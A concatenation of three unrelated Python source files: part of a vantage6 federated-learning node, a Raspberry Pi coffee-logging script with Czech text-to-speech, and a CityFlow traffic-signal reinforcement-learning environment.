for try_number in range(5):
self.log.info(
f"Starting proxyserver at '{proxy_host}:{proxy_port}'")
http_server = WSGIServer(('0.0.0.0', proxy_port), app)
try:
http_server.serve_forever()
except OSError as e:
self.log.debug(f'Error during attempt {try_number}')
self.log.debug(f'{type(e)}: {e}')
if e.errno == 48:
proxy_port = random.randint(2048, 16384)
self.log.critical(
f"Retrying with a different port: {proxy_port}")
os.environ['PROXY_SERVER_PORT'] = str(proxy_port)
else:
raise
except Exception as e:
self.log.error('Proxyserver could not be started or crashed!')
self.log.error(e)
def __sync_task_queue_with_server(self):
""" Get all unprocessed tasks from the server for this node."""
        assert self.server_io.cryptor, "Encryption has not been set up"
# request open tasks from the server
tasks = self.server_io.get_results(state="open", include_task=True)
self.log.debug(tasks)
for task in tasks:
self.queue.put(task)
self.log.info(f"received {self.queue._qsize()} tasks")
def __start_task(self, taskresult):
"""Start a task.
Start the docker image and notify the server that the task
has been started.
:param taskresult: an empty taskresult
"""
task = taskresult['task']
self.log.info("Starting task {id} - {name}".format(**task))
# notify that we are processing this task
self.server_io.set_task_start_time(taskresult["id"])
token = self.server_io.request_token_for_container(
task["id"],
task["image"]
)
token = token["container_token"]
# create a temporary volume for each run_id
# FIXME: why is docker_temporary_volume_name() in ctx???
vol_name = self.ctx.docker_temporary_volume_name(task["run_id"])
self.__docker.create_volume(vol_name)
# For some reason, if the key 'input' consists of JSON, it is
# automatically marshalled? This causes trouble, so we'll serialize it
# again.
# FIXME: should probably find & fix the root cause?
if type(taskresult['input']) == dict:
taskresult['input'] = json.dumps(taskresult['input'])
# Run the container. This adds the created container/task to the list
# __docker.active_tasks
self.__docker.run(
result_id=taskresult["id"],
image=task["image"],
docker_input=taskresult['input'],
tmp_vol_name=vol_name,
token=token
)
def __listening_worker(self):
""" Listen for incoming (websocket) messages from the server.
Runs in a separate thread. Received events are dispatched
through the appropriate action_handler for a channel.
"""
self.log.debug("listening for incoming messages")
# FIXME: while True in combination with a wait() call that never exits
        # makes joining the thread (to terminate) difficult?
while True:
# incoming messages are handled by the action_handler instance
# which is attached when the socket connection was made. wait()
            # blocks forever (if no time is specified).
self.socketIO.wait()
def __speaking_worker(self):
""" Sending messages to central server.
        Routine that runs in a separate thread, sending results
        to the server as they become available.
TODO change to a single request, might need to reconsider
the flow
"""
self.log.debug("Waiting for results to send to the server")
while True:
results = self.__docker.get_result()
# notify all of a crashed container
if results.status_code:
self.socket_tasks.emit(
'container_failed',
self.server_io.id,
results.status_code,
results.result_id,
self.server_io.collaboration_id
)
self.log.info(
f"Sending result (id={results.result_id}) to the server!")
# FIXME: why are we retrieving the result *again*? Shouldn't we
# just store the task_id when retrieving the task the first time?
response = self.server_io.request(f"result/{results.result_id}")
task_id = response.get("task").get("id")
if not task_id:
self.log.error(
f"task_id of result (id={results.result_id}) "
f"could not be retrieved"
)
return
response = self.server_io.request(f"task/{task_id}")
initiator_id = response.get("initiator")
if not initiator_id:
self.log.error(
f"Initiator id from task (id={task_id})could not be "
f"retrieved"
)
self.server_io.patch_results(
id=results.result_id,
initiator_id=initiator_id,
result={
'result': results.data,
'log': results.logs,
'finished_at': datetime.datetime.now().isoformat(),
}
)
def authenticate(self):
""" Authenticate to the central server
Authenticate with the server using the api-key. If the
server rejects for any reason we keep trying.
"""
api_key = self.config.get("api_key")
keep_trying = True
while keep_trying:
try:
self.server_io.authenticate(api_key)
except Exception as e:
msg = 'Authentication failed. Retrying in 10 seconds!'
self.log.warning(msg)
self.log.debug(e)
time.sleep(10)
else:
# This is only executed if try-block executed without error.
keep_trying = False
        # At this point, we should be connected.
self.log.info(f"Node name: {self.server_io.name}")
def private_key_filename(self):
"""Get the path to the private key."""
# FIXME: Code duplication: vantage6/cli/node.py uses a lot of the same
# logic. Suggest moving this to ctx.get_private_key()
filename = self.config['encryption']["private_key"]
# filename may be set to an empty string
if not filename:
filename = 'private_key.pem'
# If we're running dockerized, the location may have been overridden
filename = os.environ.get('PRIVATE_KEY', filename)
        # If ctx.get_data_file() receives an absolute path, it's returned as-is
fullpath = Path(self.ctx.get_data_file(filename))
return fullpath
def setup_encryption(self):
"""Setup encryption ... or don't."""
encrypted_collaboration = self.server_io.is_encrypted_collaboration()
encrypted_node = self.config['encryption']["enabled"]
if encrypted_collaboration != encrypted_node:
# You can't force it if it just ain't right, you know?
raise Exception("Expectations on encryption don't match!?")
if encrypted_collaboration:
self.log.warn('Enabling encryption!')
private_key_file = self.private_key_filename()
self.server_io.setup_encryption(private_key_file)
else:
self.log.warn('Disabling encryption!')
self.server_io.setup_encryption(None)
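    # A sketch of the configuration keys this class reads (via self.config and
    # ctx); values are placeholders and the surrounding file format is defined
    # by the vantage6 CLI, not here:
    #
    #   api_key: <node api key>
    #   server_url: https://server.example.com
    #   port: 443
    #   api_path: /api
    #   databases:
    #     default: /path/to/database.csv
    #   encryption:
    #     enabled: false
    #     private_key: private_key.pem
    #   allowed_images: []
    #   docker_registries: []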
def connect_to_socket(self):
""" Create long-lasting websocket connection with the server.
The connection is used to receive status updates, such as
new tasks.
"""
self.socketIO = SocketIO(
self.server_io.host,
port=self.server_io.port,
headers=self.server_io.headers,
wait_for_connection=True
)
# define() returns the instantiated action_handler
self.socket_tasks = self.socketIO.define(NodeTaskNamespace, '/tasks')
self.socket_tasks.set_node_worker(self)
# Log the outcome
if self.socketIO.connected:
msg = 'connected to host={host} on port={port}'
msg = msg.format(
host=self.server_io.host,
port=self.server_io.port
)
self.log.info(msg)
else:
msg = 'could *not* connect to {host} on port={port}'
msg = msg.format(
host=self.server_io.host,
port=self.server_io.port
)
self.log.critical(msg)
def get_task_and_add_to_queue(self, task_id):
"""Fetches (open) task with task_id from the server.
The `task_id` is delivered by the websocket-connection.
"""
# fetch (open) result for the node with the task_id
tasks = self.server_io.get_results(
include_task=True,
state='open',
task_id=task_id
)
# in the current setup, only a single result for a single node
# in a task exists.
for task in tasks:
self.queue.put(task)
def run_forever(self):
"""Forever check self.queue for incoming tasks (and execute them)."""
try:
while True:
                # blocks until a task becomes available; a timeout is
                # specified, else keyboard interrupts are ignored
self.log.info("Waiting for new tasks....")
while True:
try:
task = self.queue.get(timeout=1)
# if no item is returned, the Empty exception is
# triggered, thus break statement is not reached
break
except queue.Empty:
pass
except Exception as e:
self.log.debug(e)
# if task comes available, attempt to execute it
try:
self.__start_task(task)
except Exception as e:
self.log.exception(e)
except KeyboardInterrupt:
self.log.debug("Caught a keyboard interupt, shutting down...")
self.socketIO.disconnect()
sys.exit()
# ------------------------------------------------------------------------------
def run(ctx):
""" Start the node."""
logging.getLogger("urllib3").setLevel(logging.WARNING)
logging.getLogger("requests").setLevel(logging.WARNING)
logging.getLogger("socketIO-client").setLevel(logging.WARNING)
# initialize node, connect to the server using websockets
node = Node(ctx)
    # put the node to work, executing tasks that are in the queue
node.run_forever()
|
__init__.py
|
import click
import datetime
import fileinput
import gspread
import multiprocessing
import os
import queue
import sqlite3
import tempfile
from oauth2client.client import GoogleCredentials
from google.cloud import texttospeech
__version__ = 'v1.0.0'
class State:
def __init__(self):
self.quit = multiprocessing.Event()
self.queue = multiprocessing.Queue()
self.ready = multiprocessing.Event()
self.ready.set()
@click.command()
@click.version_option(version=__version__)
def main():
try:
state = State()
multiprocessing.Process(target=read, args=(state,)).start()
for line in fileinput.input():
if state.quit.is_set():
break
if state.ready.is_set():
state.ready.clear()
state.queue.put(line)
state.quit.set()
except KeyboardInterrupt:
pass
except:
state.quit.set()
def create_log(name, tag):
now = datetime.datetime.now()
scope = ['https://spreadsheets.google.com/feeds', 'https://www.googleapis.com/auth/drive']
credentials = GoogleCredentials.get_application_default().create_scoped(scope)
client = gspread.authorize(credentials)
spreadsheet = client.open("CWGTK - Coffee Log")
worksheet = spreadsheet.worksheet('Log')
values = [now.strftime('%Y-%m-%d %H:%M:%S'), tag, name if name is not None else '']
if worksheet.row_count < 2:
worksheet.append_row(['Date', 'Tag', 'Name'])
worksheet.append_row(values)
else:
worksheet.insert_row(values, index=2)
def record(tag):
conn = sqlite3.connect('sql/coffeelog.db')
c = conn.cursor()
c.execute('CREATE TABLE IF NOT EXISTS records (id INTEGER PRIMARY KEY, timestamp INTEGER NOT NULL, tag TEXT NOT NULL)')
c.execute("INSERT INTO records (timestamp, tag) VALUES (datetime('now', 'localtime'), ?)", (tag,))
conn.commit()
c.execute("SELECT count(*) FROM records WHERE timestamp >= date('now', 'localtime') AND tag = ?", (tag,))
count = c.fetchone()[0]
c.execute('CREATE TABLE IF NOT EXISTS people (id INTEGER PRIMARY KEY, tag TEXT NOT NULL, name TEXT NOT NULL, phrase TEXT NOT NULL)')
conn.commit()
c.execute("SELECT name, phrase FROM people WHERE tag = ?", (tag,))
row = c.fetchone()
name = row[0] if row is not None else None
phrase = ' ' + row[1] if row is not None else ''
conn.close()
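    # the sentence below is Czech for "Today this is coffee number {count}{phrase}."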
sentence = 'Dnes je to {}. káva{}.'.format(count, phrase)
say(sentence)
return name
def say(text):
client = texttospeech.TextToSpeechClient()
synthesis_input = texttospeech.types.SynthesisInput(text=text)
voice = texttospeech.types.VoiceSelectionParams(
language_code='cs-CZ',
name='cs-CZ-Wavenet-A',
ssml_gender=texttospeech.enums.SsmlVoiceGender.NEUTRAL)
audio_config = texttospeech.types.AudioConfig(
audio_encoding=texttospeech.enums.AudioEncoding.MP3)
response = client.synthesize_speech(synthesis_input, voice, audio_config)
with tempfile.NamedTemporaryFile(suffix='.mp3') as fp:
fp.write(response.audio_content)
fp.flush()
os.system('mpg123 -q {}'.format(fp.name))
def read(state):
try:
while not state.quit.is_set():
try:
tag = state.queue.get(timeout=0.1).rstrip()
except queue.Empty:
continue
os.system('aplay -q /home/pi/cwgtk/coffeelog/bell.wav')
name = record(tag)
state.ready.set()
create_log(name, tag)
except KeyboardInterrupt:
pass
except:
state.quit.set()
|
anon_env.py
|
import pickle
import numpy as np
import json
import sys
import pandas as pd
import os
from utility import get_cityflow_config
import time
import threading
from multiprocessing import Process, Pool
from script import get_traffic_volume
from copy import deepcopy
import cityflow
# engine = cdll.LoadLibrary("./engine.cpython-36m-x86_64-linux-gnu.so")
class Intersection:
DIC_PHASE_MAP = {
0: 1,
1: 2,
2: 3,
3: 4,
-1: 0
}
def __init__(self, inter_id, dic_traffic_env_conf, eng, light_id_dict):
self.inter_id = inter_id
self.inter_name = "intersection_{0}_{1}".format(inter_id[0], inter_id[1])
self.eng = eng
self.fast_compute = dic_traffic_env_conf['FAST_COMPUTE']
# ===== intersection settings =====
self.list_approachs = ["W", "E", "N", "S"]
self.dic_approach_to_node = {"W": 0, "E": 2, "S": 1, "N": 3}
self.dic_entering_approach_to_edge = {"W": "road_{0}_{1}_0".format(inter_id[0] - 1, inter_id[1])}
self.dic_entering_approach_to_edge.update({"E": "road_{0}_{1}_2".format(inter_id[0] + 1, inter_id[1])})
self.dic_entering_approach_to_edge.update({"N": "road_{0}_{1}_3".format(inter_id[0], inter_id[1] + 1)})
self.dic_entering_approach_to_edge.update({"S": "road_{0}_{1}_1".format(inter_id[0], inter_id[1] - 1)})
self.dic_exiting_approach_to_edge = {
approach: "road_{0}_{1}_{2}".format(inter_id[0], inter_id[1], self.dic_approach_to_node[approach]) for
approach in self.list_approachs}
# grid settings
self.length_lane = 300
self.length_terminal = 50
self.length_grid = 5
self.num_grid = int(self.length_lane // self.length_grid)
self.list_phases = dic_traffic_env_conf["PHASE"][dic_traffic_env_conf['SIMULATOR_TYPE']]
# generate all lanes
self.list_entering_lanes = []
for approach in self.list_approachs:
self.list_entering_lanes += [self.dic_entering_approach_to_edge[approach] + '_' + str(i) for i in
range(sum(list(dic_traffic_env_conf["LANE_NUM"].values())))]
self.list_exiting_lanes = []
for approach in self.list_approachs:
self.list_exiting_lanes += [self.dic_exiting_approach_to_edge[approach] + '_' + str(i) for i in
range(sum(list(dic_traffic_env_conf["LANE_NUM"].values())))]
self.list_lanes = self.list_entering_lanes + self.list_exiting_lanes
self.adjacency_row = light_id_dict['adjacency_row']
self.neighbor_ENWS = light_id_dict['neighbor_ENWS']
# previous & current
self.dic_lane_vehicle_previous_step = {}
self.dic_lane_waiting_vehicle_count_previous_step = {}
self.dic_vehicle_speed_previous_step = {}
self.dic_vehicle_distance_previous_step = {}
self.dic_lane_vehicle_current_step = {}
self.dic_lane_waiting_vehicle_count_current_step = {}
self.dic_vehicle_speed_current_step = {}
self.dic_vehicle_distance_current_step = {}
self.list_lane_vehicle_previous_step = []
self.list_lane_vehicle_current_step = []
# -1: all yellow, -2: all red, -3: none
self.all_yellow_phase_index = -1
self.all_red_phase_index = -2
self.current_phase_index = 1
self.previous_phase_index = 1
self.eng.set_tl_phase(self.inter_name, self.current_phase_index)
self.next_phase_to_set_index = None
self.current_phase_duration = -1
self.all_red_flag = False
self.all_yellow_flag = False
self.flicker = 0
self.dic_vehicle_min_speed = {} # this second
self.dic_vehicle_arrive_leave_time = dict() # cumulative
self.dic_feature = {} # this second
self.dic_feature_previous_step = {} # this second
# set
def set_signal(self, action, action_pattern, yellow_time, all_red_time):
if self.all_yellow_flag:
# in yellow phase
self.flicker = 0
if self.current_phase_duration >= yellow_time: # yellow time reached
self.current_phase_index = self.next_phase_to_set_index
self.eng.set_tl_phase(self.inter_name, self.current_phase_index) # if multi_phase, need more adjustment
self.all_yellow_flag = False
else:
pass
else:
# determine phase
if action_pattern == "switch": # switch by order
if action == 0: # keep the phase
self.next_phase_to_set_index = self.current_phase_index
elif action == 1: # change to the next phase
self.next_phase_to_set_index = (self.current_phase_index + 1) % len(
self.list_phases) # if multi_phase, need more adjustment
else:
sys.exit("action not recognized\n action must be 0 or 1")
elif action_pattern == "set": # set to certain phase
self.next_phase_to_set_index = self.DIC_PHASE_MAP[action] # if multi_phase, need more adjustment
# set phase
if self.current_phase_index == self.next_phase_to_set_index: # the light phase keeps unchanged
pass
else: # the light phase needs to change
# change to yellow first, and activate the counter and flag
self.eng.set_tl_phase(self.inter_name, 0)
self.current_phase_index = self.all_yellow_phase_index
self.all_yellow_flag = True
self.flicker = 1
# update inner measurements
def update_previous_measurements(self):
self.previous_phase_index = self.current_phase_index
self.dic_lane_vehicle_previous_step = self.dic_lane_vehicle_current_step
self.dic_lane_waiting_vehicle_count_previous_step = self.dic_lane_waiting_vehicle_count_current_step
self.dic_vehicle_speed_previous_step = self.dic_vehicle_speed_current_step
self.dic_vehicle_distance_previous_step = self.dic_vehicle_distance_current_step
def update_current_measurements_map(self, simulator_state, path_to_log, test_flag):
## need change, debug in seeing format
def _change_lane_vehicle_dic_to_list(dic_lane_vehicle):
list_lane_vehicle = []
for value in dic_lane_vehicle.values():
list_lane_vehicle.extend(value)
return list_lane_vehicle
if self.current_phase_index == self.previous_phase_index:
self.current_phase_duration += 1
else:
self.current_phase_duration = 1
self.dic_lane_vehicle_current_step = {}
self.dic_lane_waiting_vehicle_count_current_step = {}
for lane in self.list_entering_lanes:
self.dic_lane_vehicle_current_step[lane] = simulator_state["get_lane_vehicles"][lane]
self.dic_lane_waiting_vehicle_count_current_step[lane] = simulator_state["get_lane_waiting_vehicle_count"][
lane]
for lane in self.list_exiting_lanes:
self.dic_lane_waiting_vehicle_count_current_step[lane] = simulator_state["get_lane_waiting_vehicle_count"][
lane]
self.dic_vehicle_speed_current_step = simulator_state['get_vehicle_speed']
self.dic_vehicle_distance_current_step = simulator_state['get_vehicle_distance']
# get vehicle list
self.list_lane_vehicle_current_step = _change_lane_vehicle_dic_to_list(self.dic_lane_vehicle_current_step)
self.list_lane_vehicle_previous_step = _change_lane_vehicle_dic_to_list(self.dic_lane_vehicle_previous_step)
list_vehicle_new_arrive = list(
set(self.list_lane_vehicle_current_step) - set(self.list_lane_vehicle_previous_step))
list_vehicle_new_left = list(
set(self.list_lane_vehicle_previous_step) - set(self.list_lane_vehicle_current_step))
list_vehicle_new_left_entering_lane_by_lane = self._update_leave_entering_approach_vehicle()
list_vehicle_new_left_entering_lane = []
for l in list_vehicle_new_left_entering_lane_by_lane:
list_vehicle_new_left_entering_lane += l
# update vehicle arrive and left time
self._update_arrive_time(list_vehicle_new_arrive)
self._update_left_time(list_vehicle_new_left_entering_lane, path_to_log)
# update feature
self._update_feature_map(simulator_state, test_flag)
def update_current_measurements(self, path_to_log):
## need change, debug in seeing format
def _change_lane_vehicle_dic_to_list(dic_lane_vehicle):
list_lane_vehicle = []
for value in dic_lane_vehicle.values():
list_lane_vehicle.extend(value)
return list_lane_vehicle
if self.current_phase_index == self.previous_phase_index:
self.current_phase_duration += 1
else:
self.current_phase_duration = 1
self.dic_lane_vehicle_current_step = [] # = self.eng.get_lane_vehicles()
        # build the per-lane vehicle dict manually from the engine query
flow_tmp = self.eng.get_lane_vehicles()
self.dic_lane_vehicle_current_step = {key: None for key in self.list_entering_lanes}
for lane in self.list_entering_lanes:
self.dic_lane_vehicle_current_step[lane] = flow_tmp[lane]
self.dic_lane_waiting_vehicle_count_current_step = self.eng.get_lane_waiting_vehicle_count()
self.dic_vehicle_speed_current_step = self.eng.get_vehicle_speed()
self.dic_vehicle_distance_current_step = self.eng.get_vehicle_distance()
# get vehicle list
self.list_lane_vehicle_current_step = _change_lane_vehicle_dic_to_list(self.dic_lane_vehicle_current_step)
self.list_lane_vehicle_previous_step = _change_lane_vehicle_dic_to_list(self.dic_lane_vehicle_previous_step)
list_vehicle_new_arrive = list(
set(self.list_lane_vehicle_current_step) - set(self.list_lane_vehicle_previous_step))
list_vehicle_new_left = list(
set(self.list_lane_vehicle_previous_step) - set(self.list_lane_vehicle_current_step))
list_vehicle_new_left_entering_lane_by_lane = self._update_leave_entering_approach_vehicle()
list_vehicle_new_left_entering_lane = []
for l in list_vehicle_new_left_entering_lane_by_lane:
list_vehicle_new_left_entering_lane += l
# update vehicle arrive and left time
self._update_arrive_time(list_vehicle_new_arrive)
self._update_left_time(list_vehicle_new_left_entering_lane, path_to_log)
# update feature
self._update_feature()
def _update_leave_entering_approach_vehicle(self):
list_entering_lane_vehicle_left = []
# update vehicles leaving entering lane
if not self.dic_lane_vehicle_previous_step:
for lane in self.list_entering_lanes:
list_entering_lane_vehicle_left.append([])
else:
            last_step_vehicle_id_list = []
            current_step_vehicle_id_list = []
            for lane in self.list_entering_lanes:
                last_step_vehicle_id_list.extend(self.dic_lane_vehicle_previous_step[lane])
                current_step_vehicle_id_list.extend(self.dic_lane_vehicle_current_step[lane])
            list_entering_lane_vehicle_left.append(
                list(set(last_step_vehicle_id_list) - set(current_step_vehicle_id_list))
            )
return list_entering_lane_vehicle_left
def _update_arrive_time(self, list_vehicle_arrive):
ts = self.get_current_time()
# get dic vehicle enter leave time
for vehicle in list_vehicle_arrive:
if vehicle not in self.dic_vehicle_arrive_leave_time:
self.dic_vehicle_arrive_leave_time[vehicle] = \
{"enter_time": ts, "leave_time": np.nan}
else:
# print("vehicle: %s already exists in entering lane!"%vehicle)
# sys.exit(-1)
pass
def _update_left_time(self, list_vehicle_left, path_to_log):
ts = self.get_current_time()
# update the time for vehicle to leave entering lane
for vehicle in list_vehicle_left:
try:
self.dic_vehicle_arrive_leave_time[vehicle]["leave_time"] = ts
## TODO log one vehicle and then pop
self.log_one_vehicle(vehicle, path_to_log)
self.dic_vehicle_arrive_leave_time.pop(vehicle)
except KeyError:
print("vehicle not recorded when entering")
sys.exit(-1)
def log_one_vehicle(self, vehicle, path_to_log):
inter = str(self.inter_id[0]) + '_' + str(self.inter_id[1])
path_to_log_file = os.path.join(path_to_log, "vehicle_inter_{0}.csv".format(inter))
df = [vehicle, self.dic_vehicle_arrive_leave_time[vehicle]["enter_time"],
self.dic_vehicle_arrive_leave_time[vehicle]["leave_time"]]
df = pd.DataFrame(df)
df = df.transpose()
df.to_csv(path_to_log_file, mode='a', header=False, index=False)
def _update_feature(self):
dic_feature = dict()
dic_feature["cur_phase"] = [self.current_phase_index]
dic_feature["time_this_phase"] = [self.current_phase_duration]
dic_feature["vehicle_position_img"] = None # self._get_lane_vehicle_position(self.list_entering_lanes)
dic_feature["vehicle_speed_img"] = None # self._get_lane_vehicle_speed(self.list_entering_lanes)
dic_feature["vehicle_acceleration_img"] = None
dic_feature[
"vehicle_waiting_time_img"] = None # self._get_lane_vehicle_accumulated_waiting_time(self.list_entering_lanes)
dic_feature["lane_num_vehicle"] = self._get_lane_num_vehicle(self.list_entering_lanes)
dic_feature["lane_num_vehicle_downstream"] = self._get_lane_num_vehicle(self.list_exiting_lanes)
dic_feature["coming_vehicle"] = self._get_coming_vehicles()
dic_feature["leaving_vehicle"] = self._get_leaving_vehicles()
dic_feature["pressure"] = self._get_pressure()
dic_feature["adjacency_matrix"] = None # self._get_adjacency_row()
def update_neighbor_info(self, neighbors, dic_feature):
# print(dic_feature)
none_dic_feature = deepcopy(dic_feature)
for key in none_dic_feature.keys():
if none_dic_feature[key] is not None:
if "cur_phase" in key:
none_dic_feature[key] = [1] * len(none_dic_feature[key])
elif "num_total_veh" in key:
none_dic_feature[key] = []
else:
none_dic_feature[key] = [0] * len(none_dic_feature[key])
else:
none_dic_feature[key] = None
for i in range(len(neighbors)):
neighbor = neighbors[i]
example_dic_feature = {}
if neighbor is None:
example_dic_feature["cur_phase_{0}".format(i)] = none_dic_feature["cur_phase"]
example_dic_feature["time_this_phase_{0}".format(i)] = none_dic_feature["time_this_phase"]
example_dic_feature["lane_num_vehicle_{0}".format(i)] = none_dic_feature["lane_num_vehicle"]
example_dic_feature["lane_num_vehicle_downstream_{0}".format(i)] = none_dic_feature[
"lane_num_vehicle_downstream"]
else:
example_dic_feature["cur_phase_{0}".format(i)] = neighbor.dic_feature["cur_phase"]
example_dic_feature["time_this_phase_{0}".format(i)] = neighbor.dic_feature["time_this_phase"]
example_dic_feature["lane_num_vehicle_{0}".format(i)] = neighbor.dic_feature["lane_num_vehicle"]
example_dic_feature["lane_num_vehicle_downstream_{0}".format(i)] = neighbor.dic_feature[
"lane_num_vehicle_downstream"]
dic_feature.update(example_dic_feature)
return dic_feature
@staticmethod
def _add_suffix_to_dict_key(target_dict, suffix):
keys = list(target_dict.keys())
for key in keys:
target_dict[key + "_" + suffix] = target_dict.pop(key)
return target_dict
def _update_feature_map(self, simulator_state, test_flag):
dic_feature = dict()
dic_feature["cur_phase"] = [self.current_phase_index]
dic_feature["time_this_phase"] = [self.current_phase_duration]
dic_feature["vehicle_position_img"] = None # self._get_lane_vehicle_position(self.list_entering_lanes)
dic_feature["vehicle_speed_img"] = None # self._get_lane_vehicle_speed(self.list_entering_lanes)
dic_feature["vehicle_acceleration_img"] = None
dic_feature[
"vehicle_waiting_time_img"] = None # self._get_lane_vehicle_accumulated_waiting_time(self.list_entering_lanes)
dic_feature["lane_num_vehicle"] = self._get_lane_num_vehicle(self.list_entering_lanes)
dic_feature["lane_num_vehicle_downstream"] = self._get_lane_num_vehicle_downstream(simulator_state)
dic_feature["delta_lane_num_vehicle"] = [
dic_feature["lane_num_vehicle"][i] - dic_feature["lane_num_vehicle_downstream"][i] for i in
range(len(dic_feature["lane_num_vehicle_downstream"]))]
# dic_feature["pressure"] = None # [self._get_pressure()]
if self.fast_compute or test_flag:
dic_feature["coming_vehicle"] = None
dic_feature["leaving_vehicle"] = None
# dic_feature["num_total_veh"] = simulator_state['num_total_veh']
else:
dic_feature["coming_vehicle"] = self._get_coming_vehicles(simulator_state)
dic_feature["leaving_vehicle"] = self._get_leaving_vehicles(simulator_state)
# print(simulator_state['num_total_veh'])
dic_feature["num_total_veh"] = simulator_state['num_total_veh']
dic_feature["pressure"] = self._get_pressure()
dic_feature[
"lane_num_vehicle_been_stopped_thres01"] = None # self._get_lane_num_vehicle_been_stopped(0.1, self.list_entering_lanes)
dic_feature["lane_num_vehicle_been_stopped_thres1"] = self._get_lane_num_vehicle_been_stopped(1,
self.list_entering_lanes)
dic_feature["lane_queue_length"] = None # self._get_lane_queue_length(self.list_entering_lanes)
dic_feature["lane_num_vehicle_left"] = None
dic_feature["lane_sum_duration_vehicle_left"] = None
dic_feature["lane_sum_waiting_time"] = None # self._get_lane_sum_waiting_time(self.list_entering_lanes)
dic_feature["terminal"] = None
dic_feature["adjacency_matrix"] = self._get_adjacency_row()
self.dic_feature = dic_feature
def _get_adjacency_row(self):
return self.adjacency_row
def lane_position_mapper(self, lane_pos, bins):
lane_pos_np = np.array(lane_pos)
digitized = np.digitize(lane_pos_np, bins)
position_counter = [len(lane_pos_np[digitized == i]) for i in range(1, len(bins))]
return position_counter
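    # Worked example for lane_position_mapper (illustrative values): with
    # bins = [0, 100, 200, 300] and lane_pos = [10, 50, 150, 290],
    # np.digitize gives [1, 1, 2, 3], so the per-segment counter is [2, 1, 1].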
def _get_coming_vehicles(self, simulator_state):
coming_distribution = []
lane_vid_mapping_dict = simulator_state['get_lane_vehicles']
vid_distance_mapping_dict = simulator_state['get_vehicle_distance']
bins = np.linspace(0, 300, 4).tolist()
for lane in self.list_entering_lanes:
coming_vehicle_position = []
vehicle_position_lane = lane_vid_mapping_dict[lane]
for vehicle in vehicle_position_lane:
coming_vehicle_position.append(vid_distance_mapping_dict[vehicle])
coming_distribution.extend(self.lane_position_mapper(coming_vehicle_position, bins))
return coming_distribution
def _get_leaving_vehicles(self, simulator_state):
leaving_distribution = []
## dimension = num_lane*3*num_list_entering_lanes
lane_vid_mapping_dict = simulator_state['get_lane_vehicles']
vid_distance_mapping_dict = simulator_state['get_vehicle_distance']
## TODO LANE LENGTH = 300
bins = np.linspace(0, 300, 4).tolist()
for lane in self.list_exiting_lanes:
coming_vehicle_position = []
vehicle_position_lane = lane_vid_mapping_dict[lane]
for vehicle in vehicle_position_lane:
coming_vehicle_position.append(vid_distance_mapping_dict[vehicle])
leaving_distribution.extend(self.lane_position_mapper(coming_vehicle_position, bins))
return leaving_distribution
def _get_pressure(self):
return [self.dic_lane_waiting_vehicle_count_current_step[lane] for lane in self.list_entering_lanes] + \
[-self.dic_lane_waiting_vehicle_count_current_step[lane] for lane in self.list_exiting_lanes]
def _get_lane_queue_length(self, list_lanes):
'''
queue length for each lane
'''
return [self.dic_lane_waiting_vehicle_count_current_step[lane] for lane in list_lanes]
def _get_lane_num_vehicle(self, list_lanes):
'''
vehicle number for each lane
'''
return [len(self.dic_lane_vehicle_current_step[lane]) for lane in list_lanes]
def _get_lane_num_vehicle_downstream(self, simulator_state):
'''
        vehicle number for each downstream (exiting) lane
'''
lane_vid_mapping_dict = simulator_state['get_lane_vehicles']
return [len(lane_vid_mapping_dict[lane]) for lane in self.list_exiting_lanes]
def _get_lane_sum_waiting_time(self, list_lanes):
'''
waiting time for each lane
'''
raise NotImplementedError
def _get_lane_list_vehicle_left(self, list_lanes):
'''
get list of vehicles left at each lane
####### need to check
'''
raise NotImplementedError
# non temporary
def _get_lane_num_vehicle_left(self, list_lanes):
list_lane_vehicle_left = self._get_lane_list_vehicle_left(list_lanes)
list_lane_num_vehicle_left = [len(lane_vehicle_left) for lane_vehicle_left in list_lane_vehicle_left]
return list_lane_num_vehicle_left
def _get_lane_sum_duration_vehicle_left(self, list_lanes):
## not implemented error
raise NotImplementedError
def _get_lane_num_vehicle_been_stopped(self, thres, list_lanes):
return [self.dic_lane_waiting_vehicle_count_current_step[lane] for lane in list_lanes]
def _get_lane_vehicle_position(self, list_lanes):
list_lane_vector = []
for lane in list_lanes:
lane_vector = np.zeros(self.num_grid)
list_vec_id = self.dic_lane_vehicle_current_step[lane]
for vec in list_vec_id:
pos = int(self.dic_vehicle_distance_current_step[vec])
                pos_grid = min(pos // self.length_grid, self.num_grid - 1)  # clamp into the last grid cell to avoid an index error
lane_vector[pos_grid] = 1
list_lane_vector.append(lane_vector)
return np.array(list_lane_vector)
# debug
def _get_vehicle_info(self, veh_id):
try:
pos = self.dic_vehicle_distance_current_step[veh_id]
speed = self.dic_vehicle_speed_current_step[veh_id]
return pos, speed
        except (KeyError, TypeError):  # vehicle not tracked, or distance/speed maps disabled under fast compute
return None, None
def _get_lane_vehicle_speed(self, list_lanes):
return [self.dic_vehicle_speed_current_step[lane] for lane in list_lanes]
def _get_lane_vehicle_accumulated_waiting_time(self, list_lanes):
raise NotImplementedError
# ================= get functions from outside ======================
def get_current_time(self):
return self.eng.get_current_time()
def get_dic_vehicle_arrive_leave_time(self):
return self.dic_vehicle_arrive_leave_time
def get_feature(self):
return self.dic_feature
def get_state(self, list_state_features):
dic_state = {state_feature_name: self.dic_feature[state_feature_name] for state_feature_name in
list_state_features}
return dic_state
def get_reward(self, dic_reward_info):
dic_reward = dict()
dic_reward["flickering"] = None
dic_reward["sum_lane_queue_length"] = None
dic_reward["sum_lane_wait_time"] = None
dic_reward["sum_lane_num_vehicle_left"] = None
dic_reward["sum_duration_vehicle_left"] = None
dic_reward["sum_num_vehicle_been_stopped_thres01"] = None
dic_reward["sum_num_vehicle_been_stopped_thres1"] = np.sum(
self.dic_feature["lane_num_vehicle_been_stopped_thres1"])
dic_reward['pressure'] = np.absolute(np.sum(self.dic_feature["pressure"]))
reward = 0
for r in dic_reward_info:
if dic_reward_info[r] != 0:
reward += dic_reward_info[r] * dic_reward[r]
return reward
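# A minimal, self-contained sketch of the position binning used by
# lane_position_mapper() / _get_coming_vehicles() above: distances along a lane
# are dropped into three equal 100 m bins over the 300 m lane with np.digitize,
# and the per-bin counts form the coming/leaving vehicle distribution.
# The distances below are hypothetical and only serve as an illustration.
def _example_lane_position_binning():
    import numpy as np
    bins = np.linspace(0, 300, 4).tolist()        # [0.0, 100.0, 200.0, 300.0] -> 3 bins
    lane_pos = [12.5, 80.0, 150.0, 299.0]         # hypothetical distances on one lane
    digitized = np.digitize(np.array(lane_pos), bins)
    counts = [int(np.sum(digitized == i)) for i in range(1, len(bins))]
    return counts                                 # [2, 1, 1]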
class AnonEnv:
list_intersection_id = [
"intersection_1_1"
]
